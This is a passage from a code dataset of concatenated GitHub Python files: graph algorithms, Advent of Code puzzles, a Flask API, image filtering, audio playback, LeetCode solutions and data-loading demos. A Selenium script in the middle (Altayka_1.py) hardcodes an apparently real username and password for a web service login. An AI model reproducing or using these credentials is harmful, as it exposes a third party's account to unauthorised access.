payload\n","repo_name":"pfpacheco/menu-sun-api","sub_path":"promax/infrastructure/promax/order_history_by_order_id_request.py","file_name":"order_history_by_order_id_request.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43498496330","text":"import sys\r\nimport ReadGraphFromFile\r\nimport TopologicalSorting\r\n\r\n\r\ndef DAG(start, someList):\r\n length = len(someList)\r\n distance = [sys.maxsize] * length\r\n tati = [-1] * length\r\n distance[start] = 0\r\n\r\n sort_top = TopologicalSorting.topologicalSorting(someList)\r\n for x in sort_top:\r\n for i in someList[x]:\r\n if distance[x] + i[1] < distance[i[0]]:\r\n distance[i[0]] = distance[x] + i[1]\r\n tati[i[0]] = x\r\n result = []\r\n for i in sort_top:\r\n result.append((i, distance[i]))\r\n return result\r\n\r\n\r\nm, n, listAlg = ReadGraphFromFile.readWeightedFile()\r\nlista = ReadGraphFromFile.listaAdiacenta(n, listAlg, \"orientat\")\r\n\r\nprint(DAG(0, lista))\r\n","repo_name":"Fusneica-FlorentinCristian/FMI-UniBuc","sub_path":"Anul-II/Sem-I/Alg-Fundam/Random/Fundamental Algorithms Matei/Algorithms/DAG.py","file_name":"DAG.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4173835562","text":"'''Calculate the total required mass for Santa's sleigh modules.'''\nimport sys\nimport math\nimport logging\n\nlogging.basicConfig(format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.WARNING)\n\ndef calculate_total_mass(module):\n '''Performs the actual calculation'''\n\n if isinstance(module, list):\n return sum([calculate_total_mass(i) for i in module])\n\n def calculate_fuel_weight_for_mass(mass):\n logging.info('mass weighs: %s', mass)\n\n def calculate_fuel(i):\n fuel = math.floor(i / 3.0) - 2\n return max(fuel, 0)\n\n required = calculate_fuel(mass)\n additional = calculate_total_mass(required) if required > 0 else 0\n\n logging.info('required fuel for mass of size %s is %s', mass, required)\n\n return required + additional\n\n fuel_required = calculate_fuel_weight_for_mass(module)\n return fuel_required\n\nif __name__ == '__main__':\n ARGUMENTS = [int(i) for i in sys.argv[1:]]\n print(calculate_total_mass(ARGUMENTS))\n","repo_name":"drfiresign/advent-of-code","sub_path":"2019/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17232553658","text":"import json\n\nfrom webauth import auth\nfrom sqlalchemy import text, select\nfrom flask import Blueprint, jsonify, Response\nfrom database import db_session\nfrom flask_restx import fields, Resource, Namespace\n\napi = Namespace('events', \"Event related operations\")\n\nevent_model = api.model('EventModel', {\n 'Id': fields.String(description='ID of the Event'),\n 'EventCode': fields.String(description='Event Code for the Event'),\n 'Timestamp': fields.String(description='Timestamp the Event'),\n 'SecretId': fields.String(description='ID of the secret contained in the Event'),\n})\n\ndef parse_to_event(row):\n return {\n 'Id': row[0],\n 'EventCode': row[1],\n 'Timestamp': row[2].isoformat(),\n 'SecretId': row[3]\n }\n\n\n@api.route(\"/\")\nclass GetAllEvents(Resource):\n @api.doc(\n \"Get All Events\",\n responses={\n 200: \"Event Data Found\",\n 404: \"No Events Found\",\n },\n )\n @api.response(200, \"Event Data Found\", event_model)\n @api.response(400, \"No Events Found\")\n @api.doc(security=\"basicAuth\")\n @auth.login_required\n def get(self):\n from views.secrets import get_secrets_for_user\n result = db_session.execute(text(\"Select * from vault.v_SecretEvents limit 100;\")).all()\n secrets = list(i[0] for i in get_secrets_for_user(auth.current_user()))\n filtered_events = list(i for i in result if i[3] in secrets)\n return Response(response=json.dumps([parse_to_event(r) for r in filtered_events]),\n status=(200 if len(result) > 0 else 404),\n mimetype='application/json')\n","repo_name":"nyuak4769/CSGY6803_Final","sub_path":"web/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29742099953","text":"import greeter_server\nfrom bali.core import Bali\nfrom v1.app import router\n\napp = Bali(\n base_settings=None,\n routers=[{\n 'router': router,\n 'prefix': '/v1',\n }],\n backend_cors_origins=['http://127.0.0.1'],\n rpc_service=greeter_server,\n)\napp.settings(title='Bali App')\n\nif __name__ == \"__main__\":\n app.start()\n","repo_name":"Alex-xujiale/bali","sub_path":"examples/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"536350308","text":"import re\nfrom os import path\nfrom sys import argv\nimport numpy as np\nfrom yachalk import chalk\n\ndef file_path(file):\n return \"%s/%s\" % (path.dirname(argv[0]) if path.dirname(argv[0]) else \".\", file)\n\ndef load(file):\n return [list(map(int, list(l))) for l in open(file_path(file), \"r\").read().split(\"\\n\")]\n\ndef ex1(data):\n visible = len(data[0]) * 2 + (len(data)-2)*2\n for j in range(1, len(data) - 1):\n for i in range(1, len(data[0]) - 1):\n if all(map(lambda x: x < data[j][i], data[j][0:i])) or \\\n all(map(lambda x: x < data[j][i], data[j][i+1:len(data[0])])) \\\n or all(map(lambda x: x < data[j][i], list(map(lambda x: x[i], data[:j])))) \\\n or all(map(lambda x: x < data[j][i], list(map(lambda x: x[i], data[j+1:])))):\n visible += 1\n return visible\n\ndef cprint(lines, m, n):\n for j in range(len(lines)):\n for i in range(len(lines[0])):\n if m == i and n == j:\n print(chalk.red(lines[j][i]), end=\"\")\n else:\n print(lines[j][i], end=\"\")\n print(\"\")\n\n\ndef view(data, current_tree, direction):\n trees_viewed = 0\n i, j = current_tree\n tree_height = data[j][i]\n \n while True:\n i += direction[0]\n j += direction[1]\n if not(0 <= i < len(data[0])) or not(0 <= j < len(data)) :\n break\n trees_viewed += 1\n\n if data[j][i] >= tree_height:\n break\n return trees_viewed\n\n\ndef ex2(data):\n highscore = 0\n for j in range(0, len(data)):\n for i in range(0, len(data[0])):\n score = view(data, (i, j), (0, -1))*view(data, (i, j), (-1, 0))*view(data, (i, j), (1, 0))*view(data, (i, j), (0, 1))\n if score > highscore:\n highscore = score\n return highscore\n\nsample_data = load(\"sample.txt\")\nassert ex1(sample_data) == 21\n\ndata = load(\"input.txt\")\nprint(\"ex1 : %s\" % ex1(data))\n\nassert ex2(sample_data) == 8\nprint(\"ex2 : %s\" % ex2(data))","repo_name":"pataluc/AoC","sub_path":"2022/day08/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25508290238","text":"import openpyxl\nimport pprint as pp\nimport time\nfrom appium import webdriver\nfrom selenium import webdriver\nfrom typing import Optional\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.firefox.options import Options as Op\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait as W\nfrom selenium.webdriver.support import expected_conditions as E\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.firefox.service import Service\nfrom webdriver_manager.firefox import GeckoDriverManager\n\n# открываем файл Excel\nfilename = 'altayka.xlsm'\nsubcategory_dict = {}\nworkbook = openpyxl.load_workbook(filename, data_only=True)\n\n# выбираем нужный лист\nsheet = workbook['1']\n\n# Чтение содержимого ячеек по заданным диапазонам(строка, столбец)\nmax_rows = sheet.max_row\nfor i in range(14, max_rows + 1):\n ordinal_number = sheet.cell(row=i, column=1).value\n sku = sheet.cell(row=i, column=25).value\n subcategory = sheet.cell(row=i, column=4).value\n # Пропуск печати пустых ячеек\n if not sku:\n continue\n # Нумерация\n if not ordinal_number:\n break\n # Добавление к одинаковым ключам, разные значения (в столбец)\n if subcategory not in subcategory_dict:\n subcategory_dict[subcategory] = [sku]\n else:\n subcategory_dict[subcategory].append(sku)\n\n # Печать в столбик (ключ + все его значения)\n\n\n# pp.pprint(subcategory_dict)\n# print(subcategory_dict)\n\ndef summ_numbers_key():\n \"Суммирование значений одинаковых ключей\"\n my_dict = subcategory_dict\n my_dict['восп'] = sum(my_dict['восп'])\n my_dict['оп'] = sum(my_dict['оп'])\n my_dict['увп'] = sum(my_dict['увп'])\n my_dict['завед'] = sum(my_dict['завед'])\n my_dict['пр пп'] = sum(my_dict['пр пп'])\n print(my_dict)\n\n\ncount1 = count2 = count3 = count4 = count5 = count6 = count7 = count8 = count9 = count10 = \\\n count11 = count12 = count13 = count14 = count15 = count16 = 0\n\nfor values in subcategory_dict.values():\n for value in values:\n if value < 16000:\n count1 += value\n count1 = round(count1, 2)\n elif 16242.1 < value < 18680.0:\n count2 += value\n elif 18680.1 < value < 19490.0:\n count3 += value\n elif 19490.1 < value < 20300.0:\n count4 += value\n elif 20300.1 < value < 21110.0:\n count5 += value\n elif 21110.1 < value < 23550.0:\n count6 += value\n elif 23550.1 < value < 24360.0:\n count7 += value\n elif 24360.1 < value < 25990.0:\n count8 += value\n elif 25990.1 < value < 27610.0:\n count9 += value\n elif 27610.1 < value < 29240.0:\n count10 += value\n elif 29240.1 < value < 30860.0:\n count11 += value\n elif 30860.1 < value < 32480.0:\n count12 += value\n elif 32480.1 < value < 34110.0:\n count13 += value\n elif 34110.1 < value < 35730.0:\n count14 += value\n elif 35730.1 < value < 37360.0:\n count15 += value\n elif 37360.1 < value < 38980.0:\n count16 += value\ncounts = [count1, count2, count3, count4, count5, count6, count7, count8, count9, count10,\n count11, count12, count13, count14, count15, count16]\n# Вывод всех переменных\n# for i, count in enumerate(counts):\n# print(f\"count{i+1}: {round(count, 2)}\")\n# Вывод одной переменной\n# print(round(count1, 2))\n\n# Вход в DOXELL\nexec_path = r\"/Altayka-Doxell/geckodriver.exe\"\nURL = \"https://obr.doxcell.ru:8182/analyzzp/index.jsp\"\nwait_time_out = 15\ndriver_manager = GeckoDriverManager()\ndriver_manager.install()\ndriver = webdriver.Firefox(service=driver_manager.service)\ndriver.get(URL)\n\n# Ищем поле ввода логина\ninput_field = W(driver, wait_time_out).until(E.presence_of_element_located((By.NAME, \"j_username\")))\ninput_field.send_keys(\"gnovokuz\")\n\n# Ищем поле ввода пароля\ninput_field = W(driver, wait_time_out).until(E.presence_of_element_located((By.NAME, \"j_password\")))\ninput_field.send_keys(\"WG7RM3\")\n\n# Нажимаем клавишу Enter, чтобы войти в систему\ninput_field.send_keys(Keys.ENTER)\ntime.sleep(3)\nprint('Ok')\n\nelement = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[1]/table/tbody/tr[1]/td[1]/img[6]\")))\nelement.click()\ntime.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[3]/table[2]/tbody/tr[1]/td[2]/select/option[48]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[3]/div/table/tbody/tr/td[1]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[4]/table[2]/tbody/tr[2]/td[2]/select/option[10]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[4]/div/table/tbody/tr[11]/td[1]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, '//*[@id=\"ref_8440\"]')))\n# element.click()\n\n# def getOverlappingElement(driver: W, element: WebElement) -> Optional[W]:\n# rect = element.rect\n# result = driver.execute_script(\"return document.elementFromPoint(arguments[0], arguments[1]);\",\n# rect['x'] + rect['width'] // 2, rect['y'] + rect['height'] // 2)\n# if result == element:\n# result = None\n# return result\n#\n#\n# overlapping_element = getOverlappingElement(W(driver, wait_time_out), element)\n# if overlapping_element:\n# print(\"Найден перекрывающий элемент:\", overlapping_element)\n# else:\n# print(\"Перекрывающих элементов не найдено\")\n\n\n\n# Ввод значений на лист 7\n# input_field = W(driver, 10).until(E.presence_of_element_located((By.XPATH, '//*[@id=\"sform\"]/form/table/tbody/tr[1]/td[2]/input')))\n# input_field.clear()\n# input_field.send_keys(count1)\n# input_field = W(driver, 10).until(E.presence_of_element_located((By.XPATH, \"\")))\n# input_field.clear()\n# input_field.send_keys(\"220\")\n# wait_variable.until(E.element_to_be_clickable((By.XPATH, \"\"))).click()\n\n# https://obr.doxcell.ru:8180/web/index.jsp\n","repo_name":"Yurgenich87/EXEL","sub_path":"Altayka-Doxell/Altayka_1.py","file_name":"Altayka_1.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46687733546","text":"from string import ascii_uppercase\n\ndef main():\n \n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n # PART 1\n stack_lines = [x for x in lines if \"[\" in x]\n move_lines = [x.strip() for x in lines if \"move\" in x]\n\n stacks = [[] for _ in range(len(stack_lines[0]) // 4)]\n \n for line in stack_lines:\n for i in range(0, len(line), 4):\n if any(x in line[i:i+3] for x in ascii_uppercase):\n stacks[i//4].append(line[i+1])\n\n moves = []\n\n for line in move_lines:\n num_crates = int(line.split(\" \")[1])\n from_stack = int(line.split(\" \")[3]) - 1\n to_stack = int(line.split(\" \")[5]) - 1\n moves.append({\"num_crates\": num_crates, \"from_stack\": from_stack, \"to_stack\": to_stack})\n\n for move in moves:\n for i in range(move[\"num_crates\"]):\n stacks[move[\"to_stack\"]].insert(i, stacks[move[\"from_stack\"]].pop(0))\n\n print(\"\".join(stacks[x][0] for x in range(len(stacks))))\n\nif __name__ == '__main__':\n main()","repo_name":"alessandrobertani/aoc","sub_path":"Day5/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1217170480","text":"# Import libraries\nfrom super_gradients.training import models\n\n# Initialize the model\nbest_model = models.get('yolo_nas_l',\n num_classes=2,\n checkpoint_path=\"checkpoints/Train_2/ckpt_best.pth\",\n )\n##### INFERENCE ON SINGLE IMAGE\n# Test image path\ntest_image = 'dataset/test/images/image_568_cx-22_cy57_r6.png'\n\n# uncomment below line to save the predicted image\n#best_model.predict(test_image, conf=0.5,).save(\"output_folder\")\n\n# uncomment below line to visualize the predicted image\nbest_model.predict(test_image, conf=0.5,).show()\n\n###### BELOW CODE EXTRACT THE LABELS AND THE BOUNDING BOX\npredictions = best_model.predict(test_image, conf=0.5)\nprediction_objects = list(predictions._images_prediction_lst)[0]\nbboxes = prediction_objects.prediction.bboxes_xyxy\n\nint_labels = prediction_objects.prediction.labels.astype(int)\nclass_names = prediction_objects.class_names\npred_classes = [class_names[i] for i in int_labels]\nprint(pred_classes)\n\n\n\n","repo_name":"WENDGOUNDI/pcb_defect_inspection","sub_path":"test_custom_model.py","file_name":"test_custom_model.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71962238009","text":"\n# https://leetcode.com/problems/two-sum/ \n\n# 1. Two Sum\n# Easy\n\n# Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n# You can return the answer in any order.\n\n\n# Example 1:\n\n# Input: nums = [2, 7, 11, 15], target = 9\n# Output: [0, 1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n# Example 2:\n\n# Input: nums = [3, 2, 4], target = 6\n# Output: [1, 2]\n# Example 3:\n\n# Input: nums = [3, 3], target = 6\n# Output: [0, 1]\n\n\n# Constraints:\n\n# 2 <= nums.length <= 103\n# -109 <= nums[i] <= 109\n# -109 <= target <= 109\n# Only one valid answer exists.\n\n#------------------------------------------------------\n# class Solution:\n# def twoSum(self, nums: List[int], target: int) -> List[int]:\n# for val in nums:\n# compliment = target - val\n# if compliment in nums:\n# ind1 = nums.index(compliment)\n# ind2 = nums.index(val)\n# if ind1 != ind2 :\n# return [ind1,ind2]#[nums.index(compliment), nums.index(val)]\n \n# compliment = nums[ind1]\n# nums[ind1] = None\n# ind2 = nums.index(compliment)\n# return [ind1,ind2]\n\n#---------------------------------------------------\n#Solutiom using dictionary mapping \n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n d = {}\n \n for index,value in enumerate(nums):\n if(target-value in d):\n return(d[target-value],index)\n else:\n d[value] = index","repo_name":"dipbanik/DS-and-Algo","sub_path":"Python/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4813065637","text":"#!/usr/bin/env python\r\n__author__ = \"Sreenivas Bhattiprolu\"\r\n__license__ = \"Feel free to copy, I appreciate if you acknowledge Python for Microscopists\"\r\n\r\n# https://www.youtube.com/watch?v=QEz4bG9P3Qs\r\n\r\n\r\n\"\"\"\r\n@author: Sreenivas Bhattiprolu\r\n\r\nWhat are features? \r\n\r\n\r\n\"\"\"\r\n\r\n##############################################\r\n#Gabor filter, multiple filters in one. Generate fiter bank. \r\n\"\"\"\r\nFor image processing and computer vision, Gabor filters are generally \r\nused in texture analysis, edge detection, feature extraction, etc. \r\nGabor filters are special classes of bandpass filters, i.e., they allow a certain \r\n‘band’ of frequencies and reject the others.\r\n\r\n\r\nksize Size of the filter returned.\r\nsigma Standard deviation of the gaussian envelope.\r\ntheta Orientation of the normal to the parallel stripes of a Gabor function.\r\nlambda Wavelength of the sinusoidal factor.\r\ngamma Spatial aspect ratio.\r\npsi Phase offset.\r\nktype Type of filter coefficients. It can be CV_32F or CV_64F.\r\nindicates the type and range of values that each pixel in the Gabor kernel can hold.\r\nBasically float32 or float64\r\n\r\n\"\"\"\r\n \r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nksize = 5 #Use size that makes sense to the image and fetaure size. Large may not be good. \r\n#On the synthetic image it is clear how ksize affects imgae (try 5 and 50)\r\nsigma = 3 #Large sigma on small features will fully miss the features. \r\ntheta = 1*np.pi/4 #/4 shows horizontal 3/4 shows other horizontal. Try other contributions\r\nlamda = 1*np.pi /4 #1/4 works best for angled. \r\ngamma=0.4 #Value of 1 defines spherical. Calue close to 0 has high aspect ratio\r\n#Value of 1, spherical may not be ideal as it picks up features from other regions.\r\nphi = 0 #Phase offset. I leave it to 0. \r\n\r\n\r\nkernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)\r\n\r\nplt.imshow(kernel)\r\n\r\n\r\nimg = cv2.imread('synthetic.jpg')\r\n#img = cv2.imread('BSE_Image.jpg')\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nfimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)\r\n\r\nkernel_resized = cv2.resize(kernel, (400, 400)) # Resize image\r\ncv2.imshow('Kernel', kernel_resized)\r\ncv2.imshow('Original Img.', img)\r\ncv2.imshow('Filtered', fimg)\r\ncv2.waitKey(5000)\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n","repo_name":"bnsreenu/python_for_microscopists","sub_path":"058-ML_06_03_what is gabor filter.py","file_name":"058-ML_06_03_what is gabor filter.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":3177,"dataset":"github-code","pt":"77"} +{"seq_id":"29420529399","text":"# completa el código de la función\ndef amigos(a,b):\n\n divnumero1=1\n\n divnumero2=1\n\n sumadivnumero1=0\n\n sumadivnumero2=0\n\n while divnumero1 0\n except Exception as e:\n CrawlerLogger.logger.error('update article {0} failed\\n'.format(update_sql) + str(e))\n MysqlLogger.logger.error('update article {0} failed\\n'.format(update_sql) + str(e))\n\n def get_latest_articles(self, total=3):\n \"\"\"\n\n :param total: 需要的文章数量\n :return: 获取到的文章\n \"\"\"\n sql = 'SELECT * FROM bai_article ORDER BY publishTime DESC LIMIT {0}'.format(total)\n CrawlerLogger.logger.info('get latest ' + str(total) + ' articles: ' + sql)\n MysqlLogger.logger.info('get latest ' + str(total) + ' articles: ' + sql)\n article_records = self.db.query(sql)\n articles = Article.to_articles(article_records)\n return articles # \n # 待补充 total 超出总记录数的处理\n\n\nif __name__ == '__main__':\n\n CrawlerLogger.set_up('logs/crawler.log')\n MysqlLogger.set_up('logs/mysql.log')\n dao = ArticleDao()\n dao.import_from_file('docs/bai_article2') ## 测试 insert\n # one_article = dao.get_latest_articles(1)\n # print \"one_article's type(expected ):\", type(one_article)\n # print \"one_article's type(expected ):\", type(one_article[0])\n","repo_name":"puddingandsesame/lilac","sub_path":"bin/crawler/ArticleDao.py","file_name":"ArticleDao.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2204914384","text":"import pyaudio\r\nimport time\r\nimport wave\r\n\r\nfrom pydub import AudioSegment\r\nfrom pydub.playback import play\r\n\r\nCABLE_A = \"CABLE-A Input (VB-Audio Cable A\"\r\n\r\n\r\ndef get_device_by_name(p, name):\r\n for i in range(p.get_device_count()):\r\n if p.get_device_info_by_index(i)[\"name\"] == name:\r\n print(p.get_device_info_by_index(i))\r\n return i\r\n return None\r\n\r\np = pyaudio.PyAudio()\r\nsegment = AudioSegment.from_file(\"warmup.wav\")\r\nframe_size = segment.channels * segment.sample_width\r\nsegment_iterator = 0\r\nprint(segment.frame_count())\r\n\r\nwave_file = wave.open(\"warmup.wav\", \"rb\")\r\nprint(wave_file.getnframes())\r\n\r\nprint(\"AADFSF\")\r\n\r\n\r\nprint(len(segment))\r\n# play(segment)\r\n\r\ndef callback(in_data, frame_count, time_info, status):\r\n global segment\r\n global segment_iterator\r\n global wave_file\r\n global frame_size\r\n wave_data = wave_file.readframes(frame_count)\r\n\r\n print(segment.frame_width)\r\n\r\n data = segment._data[segment_iterator * segment.frame_width:(segment_iterator + frame_count) * segment.frame_width]\r\n\r\n print(f\"data comp {wave_data == data}\")\r\n print(len(wave_data))\r\n print(len(data))\r\n\r\n segment_iterator += frame_count\r\n\r\n return data, pyaudio.paContinue\r\n\r\nstream = p.open(\r\n format = p.get_format_from_width(segment.sample_width),\r\n channels=segment.channels,\r\n rate=segment.frame_rate,\r\n output=True,\r\n stream_callback=callback\r\n # output_device_index=get_device_by_name(p, CABLE_A)\r\n)\r\n\r\nprint(\"STarting the stream\")\r\n\r\nstream.start_stream()\r\n\r\nwhile stream.is_active():\r\n time.sleep(0.1)\r\n\r\nprint(\"Shutting down\")\r\n\r\nstream.stop_stream()\r\nstream.close()\r\np.terminate()\r\n","repo_name":"admiralbolt/stream-stuff","sub_path":"scratch/audio_segment_playback.py","file_name":"audio_segment_playback.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"43372609828","text":"import pandas as pd\n\n\n# Write a solution to calculate the number of unique subjects each teacher teaches in the university.\n# Return the result table in any order.\n# -----------------\n# Teacher table:\n# +------------+------------+---------+\n# | teacher_id | subject_id | dept_id |\n# +------------+------------+---------+\n# | 1 | 2 | 3 |\n# | 1 | 2 | 4 |\n# | 1 | 3 | 3 |\n# | 2 | 1 | 1 |\n# | 2 | 2 | 1 |\n# | 2 | 3 | 1 |\n# | 2 | 4 | 1 |\n# +------------+------------+---------+\n# Output:\n# +------------+-----+\n# | teacher_id | cnt |\n# +------------+-----+\n# | 1 | 2 |\n# | 2 | 4 |\n# +------------+-----+\n\n\ndef count_unique_subjects(teacher: pd.DataFrame) -> pd.DataFrame:\n # Drop all duplicates, we don't need them ->\n teacher.drop_duplicates(subset=['teacher_id', 'subject_id'], inplace=True)\n # -> count every unique combination of teacher_id + subject_id ->\n teacher['cnt'] = teacher.groupby(by='teacher_id')['subject_id'].transform('count')\n # -> every teacher_id on the same row as cnt, we only need One Id.\n teacher.drop_duplicates(subset=['teacher_id', 'cnt'], inplace=True)\n return teacher[['teacher_id', 'cnt']]\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p2356_number_of_unique_subjects_taught_by_each_teacher_pandas.py","file_name":"p2356_number_of_unique_subjects_taught_by_each_teacher_pandas.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27434456619","text":"# ************************************************\n# username : smmehrab\n# fullname : s.m.mehrabul islam\n# email : smmehrabul-2017614964@cs.du.ac.bd\n# institute : university of dhaka, bangladesh\n# reg : 2017614964\n# ************************************************\n\nclass CountSorter:\n\n def __init__(self) -> None:\n pass\n\n def sort(self, values:list) -> list:\n \n n = len(values)\n vmax = int(max(values))\n vmin = int(min(values))\n vrange = vmax-vmin+1\n\n # init\n count = [0]*vrange\n output = [0]*n\n\n # count\n for value in values:\n count[value-vmin] += 1\n \n # cumulative count\n for index in range(1, vrange):\n count[index] += count[index-1]\n\n # sorted placement (reverse)\n for index in range(len(values)-1, -1, -1):\n cindex = values[index]-vmin\n oindex = count[cindex]-1\n output[oindex] = values[index]\n count[cindex] -= 1\n\n return output\n","repo_name":"smmehrab/problem-solving","sub_path":"codes/_algorithms/sort/count_sort.py","file_name":"count_sort.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18042243539","text":"__author__ = \"Lei Cai\"\n__copyright__ = \"Copyright 2021, GeospaceLab\"\n__license__ = \"BSD-3-Clause License\"\n__email__ = \"lei.cai@oulu.fi\"\n__docformat__ = \"reStructureText\"\n\nimport datetime\nimport geospacelab.express.omni_dashboard as omni\n\ndt_fr = datetime.datetime.strptime('20160321' + '0600', '%Y%m%d%H%M')\ndt_to = datetime.datetime.strptime('20160330' + '0600', '%Y%m%d%H%M')\n\nomni_type = 'OMNI2' # 'OMNI' or 'OMNI2'\nomni_res = '1min' # '1min' or '5min'\nload_mode = 'AUTO'\ndashboard = omni.OMNIDashboard(\n dt_fr, dt_to, omni_type=omni_type, omni_res=omni_res, load_mode=load_mode\n)\n\n# data can be retrieved in the same way as in Example 1:\ndashboard.list_assigned_variables()\nB_x_gsm = dashboard.get_variable('B_x_GSM', dataset_index=0) # Omni dataset index is 1 in the OMNIDashboard. To check other dashboards, use the method \"list_datasets()\"\nprint(B_x_gsm)\n\ndashboard.quicklook()\n\ndashboard.list_assigned_variables()\n\n# save figure\ndashboard.save_figure()","repo_name":"JouleCai/geospacelab","sub_path":"examples/demo_omni_data.py","file_name":"demo_omni_data.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"26076364322","text":"\nfrom django.urls import path\nfrom blogs import views\n\nurlpatterns = [\n path('blog/categories/', views.home, name='home'),\n path('blog/categories/', views.detail, name='detail'),\n path('blog/posts/', views.posts, name='post_home'),\n path('blog/posts/', views.posts_details, name='posts_details'),\n path('blog/authors/', views.authors),\n path('blog/authors/', views.authors_details),\n path('blog/posts/new/', views.createblog_form, name='new_post'),\n path('blog/category/new/', views.category_form, name='new_category'),\n\n]\n","repo_name":"E-Hammond/django_blog-demo-","sub_path":"blogs/urls - Copy.py","file_name":"urls - Copy.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15474719240","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root: Optional[TreeNode]) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n string = []\n def preorder(node):\n if not node:\n string.append(\"#\")\n string.append(\",\")\n return None\n string.append(str(node.val))\n string.append(\",\")\n preorder(node.left)\n preorder(node.right)\n \n preorder(root)\n return \"\".join(string)\n\n def deserialize(self, data: str) -> Optional[TreeNode]:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n string = data.split(\",\")\n counter = -1\n \n def buildtree(string):\n nonlocal counter\n counter += 1\n if string[counter] == \"#\":\n return None\n node = TreeNode(int(string[counter]))\n node.left = buildtree(string)\n node.right = buildtree(string)\n return node\n \n return buildtree(string)\n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# return ans","repo_name":"Tolosa-mitiku/leet-code","sub_path":"0449-serialize-and-deserialize-bst/0449-serialize-and-deserialize-bst.py","file_name":"0449-serialize-and-deserialize-bst.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74227333047","text":"# Razminka 1\ndef maximum(a):\n more = a[0]\n for i in a:\n if more < i:\n more = i\n return more\n\n\na = [10, 27, 42, 36]\nmax_value = maximum(a)\nprint(max_value)\n\n\n\n# Razminka 2\na = [10, 20, 30, 40]\nfor i in range(len(a)):\n print(f\"({i}, 